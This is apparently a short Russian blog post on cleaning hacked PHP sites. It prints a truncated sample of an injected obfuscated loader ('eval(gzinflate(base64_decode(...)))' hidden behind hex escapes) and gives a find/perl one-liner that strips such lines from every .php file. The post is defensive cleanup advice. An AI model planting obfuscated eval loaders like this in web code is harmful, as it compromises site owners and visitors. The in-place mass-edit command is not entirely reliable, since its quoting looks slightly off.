Удаление кода

Не боимся различных спец.символов.

<?php eval(«\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\
x28’jVNtT9tADP4+af8hQxNtBW0

WqZ03tXtv1XthvHnT853nP6Udw5O+8376F1Vr+Se/qlsnaHrF+/AQ==’\x29\x29\x29\x3B»); ?>

Делаем резервную копию изменяемых файлов и запускаем команду

find ./ -type f -name «*.php» -exec perl -pi -e ‘s/\<\?php\ eval.*\»\)\;\ \?\>//g»’ ‘{}’ \;

Другие публикации по теме:

Удаление кода eval(base64_decode(«DQplcnJvcl9... Не буду публиковать тела вредоносного кода целиком, дабы поисковики не подумали чего плохого =)
The Offical Joomla! Book  Скачать в PDF можно на моей книжной полке по ссылке: The Official Joomla Book
Обновление Joomla 1.6 до Joomla 1.7 Раздел статьи "Быстрое обновление" подходит только для сайтов, которые уже обновлены до Joomla 1.6.5., если версия движка вашего сайта не 1.6.5, то ...

Поделиться информацией с друзьями!

Чтобы не пропустить обновления, подпишись на RSS или почтовую рассылку (свой выбор сделали уже 128 человек!)

Оставить комментарий